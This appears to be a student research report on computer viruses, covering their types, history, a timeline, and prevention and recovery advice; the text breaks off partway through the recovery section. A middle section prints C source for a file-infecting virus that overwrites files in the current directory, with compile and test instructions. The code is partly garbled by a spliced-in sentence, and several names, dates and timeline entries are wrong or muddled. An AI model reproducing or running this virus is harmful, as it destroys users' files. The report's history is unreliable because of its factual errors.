Background Of Studies On Computer Viruses

A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.

Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves.

Section 1.2 – Background of Studies on Various Computer Viruses

Boot Sector Viruses

This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk.

This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive.

Examples of boot viruses include: Polyboot.B, AntiEXE.

Companion Viruses

Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder.

It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they “accompany” the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses).

Some examples include: Stator, Asimov.1539, and Terrax.1069

Encrypted Viruses

This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves.

Logic Bomb Viruses

Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on.

They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.

Macro Viruses

When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols.

Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook.

Multipartite Viruses

Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone.

It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus.

Once infected it becomes impossible to locate the original files

Example: Ghost ball, the first multipartite virus.

Nonresident Viruses

This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed).

Polymorphic Viruses:

Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication.

Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.

Examples include: Elkern, Marburg, Satan Bug, and Tuareg.

Resident Viruses

Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors.

This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc.

Examples include: Randex, CMJ, Meve, and MrKlunky.

Stealth Viruses / Worm

Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them.

A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus.

Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson.

Section 1.3.1 Research Question

1. How did the diff. types of computer Viruses Created when, where, by whom?

2. How are they attack/work on the end user computers?

3. How we protect ourself from such type of computer viruses?

4. What will be the future trend of computer viruses?

Section 1.3.2 Research Aim

The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business

Section 1.3.3 Research Objective

The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer.

Section 1.3.4 Research Hypothesis

Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesn’t realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded.

The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the world’s financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. It’s the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincare’s admonition is most likely to come into play.

Chapter 2 – Literature Review

What is Computer virus?

Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.

Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves

History of Computer viruses

The first academic work on the theory of computer viruses (although the term “computer virus” was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the “Theory and Organization of Complicated Automata”. The work of von Neumann was later published as the “Theory of self-reproducing automata” In his essay von Neumann postulated that a computer program could reproduce.

In 1972 Veith Risak published his article “Selbstreproduzierende Automaton mitt minimaler Informationsübertragung” (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system.

In 1984 Fred Cohen from the University of Southern California wrote his paper “Computer Viruses – Theory and Experiments” It was the first paper to explicitly call a self-reproducing program a “virus”; a term introduced by his mentor Leonard Adelman.

An article that describes “useful virus functionalities” was published by J. B. Gunn under the title “Use of virus functions to provide a virtual APL interpreter under user control” in 1984.

Science Fiction

The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers.

The actual term ‘virus’ was first used in David Gerrold’s 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off.

Virus programs History

The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, “I’m the creeper, catch me if you can!” was displayed. The Reaper program was created to delete Creeper.

A program called “Elk Cloner” was the first computer virus to appear “in the wild” – that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning “Elk Cloner: The program with a personality.”

The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written.

Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years.

Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software.

Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface.

Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a “mating” of the two and would likely be detected as a virus unique from the “parents”.

A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating.

Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo.

Time line of computer viruses:

In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection.

YEAR

VIRUS NAME

BY WHOM

TYPE

1982

ELK CLONER

RICH SKRENTA

1983

COMPUTER VIRUS

FRED COHEN

1986

BRAIN

PAKISTAN

BOOT SECTOR

1988

ARPANET

ROBBERT MORRIS

ENCRYPTED

1989

AIDS

TROJAN

1990

ANTI-VIRUS S/W

1991

NON-ANTI S/W

SYMANTEC

POLYMORPHIC

1994

HOAX

1995

WORD

1999

MELLISA

DAVID L. SMITH

2000

I LOVE U

FILIPINE STUDENT

2001

CODE RED WORM

2003

SLAMMER

2004

MY DOON/NOVARG

2005

COMMWARRIOR-A

RUSSIA

CELL PHONE

2008

CONFICKER

2009

CYNER ATTACK

W32.DOZOR

2010

STUNEXT

TROJAN

2011

HTTP BOT

BLACK SHADES

Programming language used for creating Computer Viruses:

C

C++

Assembler

PHP

JAVA SCRIPT

VB SCRIPT

MICRO LANGUAGE/CODE

How Computer Viruses Work

As you’ll see in the next section, the term virus was applied to this type of software very early in its history. It’s an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies.

A biological virus isn’t truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cell’s normal mechanisms to reproduce itself.

A computer virus is like a biological virus in that it also isn’t an independent entity; it must Piggyback on a host (another program or document) in order to propagate.

How a virus infects your computer

1. Virus program is launched.

2. Virus code is loaded into PC memory.

3. Virus delivers its destructive payload.

4. Virus copies itself to other programs.

How Computer Viruses Work 5

If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code).

Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer.

It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs.

Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of user’s offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly.

As you might suspect, most viruses are designed to deliver their payload when they’re first executed. However, some viruses won’t attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper

Agent in a spy novel, until they’re awoken on a specific date; then they go about the work them were programmed to do.

In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination.

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include

#include

#include

#include

#include

#include

FILE *virus,*host;

int done, a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;

void main()

{

st=clock();

clrscr();

done=findfirst(“*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”r3. Virus delivers its destructive payload.

b”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL) goto next;

x=89088;

printf(“Infecting %sn”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(“DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(“TIME TAKEN=%f SECn”,

(end-st)/CLK_TCK);

getch();

}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once, note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it. The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to re-infect.

Why Viruses Exist

Computer viruses, unlike biological viruses, don’t spring up out of now here-they’re created. By people. And the people-programmers and developers, typically-who create computer viruses Know what they’re doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users.

The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA.

By using a “build your own virus” program-of which there are several available, Via the Internet underground.

So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users.

This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards.

Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a “successful” virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled.

Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale.

In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such

Pleasure can come from writing destructive virus code.

What You Can Do About Computer Viruses

There’s very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesn’t always mean there are fewer criminals; the truth is, there’s a new batch of virus writers coming online every day.

All of which means that you can’t rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself.

Reducing Your Chances of Infection

To make yourself less of a target for virus infection, take the following steps:

Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to.

Don’t open any e-mail attachments you weren’t expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive.

Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. They’re a good first line of defence,

As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates.

Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses.

Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You can’t do this unless you plan ahead and back up your important data.

“Preventing Viruses Attacks.”

Diagnosing a Virus Infection

How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didn’t do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for:

• Programs quit working or freeze up.

• Documents become inaccessible.

• Computer freezes up or won’t start properly.

• The CAPS LOCK key quits working-or works intermittently.

• Files increase in size.

• Frequent error messages appear onscreen.

• Strange messages or pictures appear onscreen.

• Your PC emits strange sounds.

• Friends and colleagues inform you that they’ve received strange e-mails from you, that you don’t remember sending.

“How to Catch a Virus.”

Recovering from a Virus Attack

If you’re unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system.

You don’t, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools.

The right tools include one of the major antivirus programs discussed in “Anti-Virus Software and Services.” These programs-such as Norton Antivirus